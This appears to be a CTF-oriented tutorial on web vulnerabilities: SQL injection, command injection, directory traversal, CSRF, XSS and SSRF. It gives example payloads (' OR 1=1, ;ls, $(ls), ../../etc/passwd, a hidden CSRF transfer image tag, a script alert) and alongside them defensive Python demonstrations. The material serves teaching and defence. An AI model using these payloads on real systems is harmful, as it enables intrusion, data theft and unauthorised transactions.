These vulnerabilities often show up in CTFs as web security challenges where the user needs to exploit a bug to gain some kind of higher-level privilege.
Common vulnerabilities to see in CTF challenges:
- SQL Injection
- Command Injection
- Directory Traversal
- Cross-Site Request Forgery
- Cross-Site Scripting
- Server-Side Request Forgery
SQL Injection
SQL Injection is a vulnerability where an application takes input from a user and places it into a SQL query without checking that the input contains no additional SQL.
<?php
$username = $_GET['username']; // kchung
$result = mysql_query("SELECT * FROM users WHERE username='$username'");
?>
If we look at the $username variable, we might expect the username parameter to be a real username (e.g. kchung) under normal operation.
But a malicious user might submit a different kind of data. For example, what if the input was a single quote (')?
The application would crash because the resulting SQL query is incorrect.
SELECT * FROM users WHERE username='''
Notice the extra single quote at the end.
With the knowledge that a single quote will cause an error in the application, we can expand a little more on SQL Injection.
What if our input was ' OR 1=1?
SELECT * FROM users WHERE username='' OR 1=1
1 is indeed equal to 1, which evaluates to true in SQL. Reinterpreted, the SQL statement is really saying:
SELECT * FROM users WHERE username='' OR true
This returns every row in the table because the WHERE condition is true for every row.
We can also inject comments and termination characters like --, /*, or ;. This allows you to terminate SQL queries after your injected statements. For example, '-- is a common SQL injection payload.
SELECT * FROM users WHERE username=''-- '
This payload sets the username parameter to an empty string to break out of the query and then adds a comment (--) that effectively hides the second single quote.
Using this technique of adding SQL statements to an existing query, we can force databases to return data that they were not meant to return.
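The effect of the payload is easy to reproduce locally. The Python sketch below uses the standard sqlite3 module with an in-memory database as a stand-in for the PHP/MySQL setup above. The table contents and function names are invented for the demonstration, and the parameterized query is shown only for contrast.

```python
import sqlite3


def make_db():
    """Create a throwaway in-memory users table with two rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, note TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("kchung", "first user"), ("admin", "second user")])
    return db


def lookup_vulnerable(db, username):
    # User input is pasted straight into the SQL text, as in the PHP example.
    query = "SELECT username FROM users WHERE username='" + username + "'"
    return db.execute(query).fetchall()


def lookup_parameterized(db, username):
    # The driver passes the value separately, so it is never parsed as SQL.
    return db.execute("SELECT username FROM users WHERE username=?",
                      (username,)).fetchall()


db = make_db()
payload = "' OR 1=1 -- "

print(lookup_vulnerable(db, "kchung"))          # [('kchung',)]
print(len(lookup_vulnerable(db, payload)))      # 2, every row comes back
print(lookup_parameterized(db, payload))        # []
```

With the payload, the vulnerable query becomes username='' OR 1=1 followed by a comment, so the condition holds for every row; the parameterized version simply looks for a user whose name is the literal payload string.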
Command Injection
Command Injection is a vulnerability that allows an attacker to submit system commands to a computer running a website. This happens when the application fails to encode user input that goes into a system shell. It is very common to see this vulnerability when a developer uses the system() command or its equivalent in the application's programming language.
import os
domain = user_input() # ctf101.org
os.system('ping ' + domain)
The above code, when used normally, will ping the ctf101.org domain.
But consider what would happen if the user_input() function returned different data.
import os
domain = user_input() # ; ls
os.system('ping ' + domain)
Because of the additional semicolon, the os.system() function is instructed to run two commands.
To the shell, the command looks like:
ping ; ls
The semicolon terminates a command in bash and allows you to put another command after it.
Because the ping command is being terminated and the ls command is being added on, the ls command will be run in addition to the empty ping command!
This is the core concept behind command injection. The ls command could of course be switched with another command (e.g. wget, curl, bash, etc.)
Command injection is a very common means of privilege escalation within web applications and applications that interface with system commands. Many kinds of home routers take user input and directly append it to a system command. For this reason, many of those home router models are vulnerable to command injection.
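The contrast between building a shell string and building an argument list can be shown without running anything. In the Python sketch below, build_shell_string mirrors the vulnerable concatenation from the example, while build_argv validates the input and returns a list that could be handed to subprocess.run without a shell. The function names, the validation pattern, and the -c 1 ping option (one probe, as on Linux and macOS) are assumptions for illustration.

```python
import re

# A conservative pattern for hostnames: letters, digits, dots and hyphens,
# starting and ending with a letter or digit.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9]([A-Za-z0-9.-]{0,251}[A-Za-z0-9])?")


def build_shell_string(domain):
    """What the vulnerable code hands to the shell."""
    return "ping " + domain


def build_argv(domain):
    """Validate the input and return an argument list for use without a shell."""
    if not HOSTNAME_RE.fullmatch(domain):
        raise ValueError("not a plausible hostname: %r" % domain)
    return ["ping", "-c", "1", domain]


print(build_shell_string("; ls"))   # ping ; ls
print(build_argv("ctf101.org"))     # ['ping', '-c', '1', 'ctf101.org']

try:
    build_argv("; ls")
except ValueError as error:
    print("rejected:", error)
```

Because the list form never passes through a shell, characters such as ; or $( ) have no special meaning, and the validation step additionally rejects input that does not look like a hostname at all.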
Example Payloads
;ls
$(ls)
`ls`
Directory Traversal
Directory Traversal is a vulnerability where an application takes in user input and uses it in a directory path.
Any kind of path controlled by user input that isn't properly sanitized or properly sandboxed could be vulnerable to directory traversal.
For example, consider an application that allows the user to choose what page to load from a GET parameter.
<?php
$page = $_GET['page']; // index.php
include("/var/www/html/" . $page);
?>
Under normal operation, the page would be index.php. But what if a malicious user supplied something different?
<?php
$page = $_GET['page']; // ../../../../../../../../etc/passwd
include("/var/www/html/" . $page);
?>
Here the user is submitting ../../../../../../../../etc/passwd.
This will result in the PHP interpreter leaving the directory that it is coded to look in ('/var/www/html') and instead be forced up to the root folder.
include("/var/www/html/../../../../../../../../etc/passwd");
Ultimately this resolves to /etc/passwd because the operating system will not go above the root directory.
Thus the application will load the /etc/passwd file and emit it to the user like so:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
This same concept can be applied to applications where some input is taken from a user and then used to access a file or path or similar. This vulnerability very often can be used to leak sensitive data or extract application source code to find other vulnerabilities.
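The path resolution described above can be reproduced with Python's posixpath module, which applies POSIX path rules on any platform. In the sketch below, resolve_naive shows where the traversal payload ends up, and resolve_checked adds a containment check. Both function names are hypothetical, and the check is purely lexical: it does not follow symbolic links, which a real application would also need to consider.

```python
import posixpath

BASE = "/var/www/html"


def resolve_naive(page):
    """Join the user-supplied page onto the web root and normalize the result."""
    return posixpath.normpath(posixpath.join(BASE, page))


def resolve_checked(page):
    """Like resolve_naive, but refuse paths that end up outside the web root."""
    full = posixpath.normpath(posixpath.join(BASE, page))
    if posixpath.commonpath([BASE, full]) != BASE:
        raise ValueError("path escapes the web root: %r" % page)
    return full


payload = "../../../../../../../../etc/passwd"

print(resolve_naive("index.php"))  # /var/www/html/index.php
print(resolve_naive(payload))      # /etc/passwd

try:
    resolve_checked(payload)
except ValueError as error:
    print("rejected:", error)
```

The extra ../ segments are harmless to the attacker because normalization stops at the root, which is why payloads usually contain more of them than strictly necessary.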
Cross-Site Request Forgery (CSRF)
A Cross-Site Request Forgery or CSRF attack (pronounced "sea surf") is an attack on an authenticated user that abuses the user's existing session to perform state-changing actions such as a purchase, a transfer of funds, or a change of email address.
The premise of CSRF is riding the victim's authenticated session: the attacker gets the victim's browser to send a request, usually by injecting a malicious element such as an <img> tag or an <iframe> into a webpage where references to external resources are unverified.
Using CSRF
GET requests are often used by websites to get user input. Say a user signs in to a banking site that assigns their browser a cookie that keeps them logged in. If they transfer some money, the URL that is sent to the server might have the pattern:
http://securibank.com/transfer.do?acct=[RECIPIENT]&amount=[DOLLARS]
Knowing this format, an attacker can send an email with a hyperlink to be clicked on, or they can include an image tag of 0 by 0 pixels, which the browser requests automatically, such as:
<img src="http://securibank.com/transfer.do?acct=[RECIPIENT]&amount=[DOLLARS]" width="0" height="0" border="0">
Cross-Site Scripting (XSS)
Cross-Site Scripting or XSS is a vulnerability where one user of an application can send JavaScript that is executed by the browser of another user of the same application.
This is a vulnerability because JavaScript has a high degree of control over a user's web browser.
For example, JavaScript has the ability to:
- Modify the page (called the DOM)
- Send more HTTP requests
- Access cookies
By combining all of these abilities, XSS can maliciously use JavaScript to extract users' cookies and send them to an attacker-controlled server. XSS can also modify the DOM to phish users for their passwords. This only scratches the surface of what XSS can be used to do.
XSS is typically broken down into three categories:
- Reflected XSS
- Stored XSS
- DOM XSS
Reflected XSS
Reflected XSS is when an XSS exploit is provided through a URL parameter.
For example:
https://ctf101.org?data=<script>alert(1)</script>
You can see the XSS exploit provided in the data GET parameter. If the application is vulnerable to reflected XSS, the application will take this data parameter value and inject it into the DOM.
For example:
<html>
<body>
<script>alert(1)</script>
</body>
</html>
Depending on where the exploit gets injected, it may need to be constructed differently.
Also, the exploit payload can change to fit whatever the attacker needs it to do. Whether that is to extract cookies and submit them to an external server, or to simply modify the page to deface it.
One of the deficiencies of reflected XSS, however, is that it requires the victim to access the vulnerable page from an attacker-controlled resource. Notice that if the data parameter weren't provided, the exploit wouldn't work.
In many situations, reflected XSS is detected by the browser because it is very simple for a browser to detect malicious XSS payloads in URLs.
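The reflection step can be sketched in a few lines. The Python example below builds the page from the data parameter in two ways: by pasting the value in unchanged, as a vulnerable application would, and by passing it through html.escape first. The render functions are hypothetical stand-ins for a server-side template.

```python
import html


def render_vulnerable(data):
    """Paste the parameter into the page unchanged."""
    return "<html><body>" + data + "</body></html>"


def render_escaped(data):
    """Escape HTML metacharacters before placing the value in the page."""
    return "<html><body>" + html.escape(data) + "</body></html>"


payload = "<script>alert(1)</script>"

print(render_vulnerable(payload))
# <html><body><script>alert(1)</script></body></html>

print(render_escaped(payload))
# <html><body>&lt;script&gt;alert(1)&lt;/script&gt;</body></html>
```

In the first page the browser sees a real script element and runs it; in the second it sees only text. Escaping of this kind is context-dependent, which is one reason a payload may need to be constructed differently depending on where it lands.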
Stored XSS
Stored XSS is different from reflected XSS in one key way. In reflected XSS, the exploit is provided through a GET parameter. But in stored XSS, the exploit is provided from the website itself.
Imagine a website that allows users to post comments. If a user can submit an XSS payload as a comment, and then have others view that malicious comment, it would be an example of stored XSS.
The reason is that the website itself is serving up the XSS payload to other users. This makes it very difficult to detect from the browser's perspective and no browser is capable of generically preventing stored XSS from exploiting a user.
DOM XSS
DOM XSS is XSS that is due to the browser itself injecting an XSS payload into the DOM. While the server itself may properly prevent XSS, it's possible that the client-side scripts may accidentally take a payload and insert it into the DOM and cause the payload to trigger.
The server itself is not to blame, but the client-side JavaScript files are causing the issue.
Server Side Request Forgery (SSRF)
Server Side Request Forgery or SSRF is where an attacker is able to cause a web application to send a request that the attacker defines.
For example, say there is a website that lets you take a screenshot of any site on the internet.
Under normal usage, a user might ask it to take a screenshot of a page like Google, or The New York Times. But what if a user does something more nefarious? What if they asked the site to take a picture of http://localhost? Or perhaps tries to access something more useful like http://localhost/server-status?
127.0.0.1 (also known as localhost or loopback) represents the computer itself. Accessing localhost means you are accessing the computer's own internal network. Developers often use localhost as a way to access the services they have running on their own computers.
Depending on what the response from the site is, the attacker may be able to gain additional information about what's running on the computer itself.
In addition, the requests originating from the server would come from the server's IP, not the attacker's IP. Because of that, it is possible that the attacker might be able to access internal resources that they wouldn't normally be able to access.
Another usage for SSRF is to create a simple port scanner to scan the internal network looking for internal services.
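To make the idea of an "internal" target concrete, the Python sketch below classifies a URL by its host using the standard ipaddress and urllib.parse modules. It only recognizes the name localhost and literal IP addresses; a hostname that resolves to an internal address through DNS would slip past it, so this is an illustration of the concept rather than a complete filter. The function name is hypothetical.

```python
import ipaddress
from urllib.parse import urlsplit


def is_literal_internal_address(url):
    """Return True if the URL's host is localhost or a loopback/private/link-local IP."""
    host = urlsplit(url).hostname
    if host is None:
        return True  # cannot parse a host: treat as unsafe
    if host == "localhost":
        return True
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name; a real check would have to resolve it first
    return address.is_loopback or address.is_private or address.is_link_local


for url in ["http://localhost/server-status",
            "http://127.0.0.1/",
            "http://10.0.0.5:8080/admin",
            "http://[::1]/",
            "http://93.184.216.34/"]:
    print(url, is_literal_internal_address(url))
```

From the attacker's side, the same list of address ranges is what an SSRF-based port scan would iterate over.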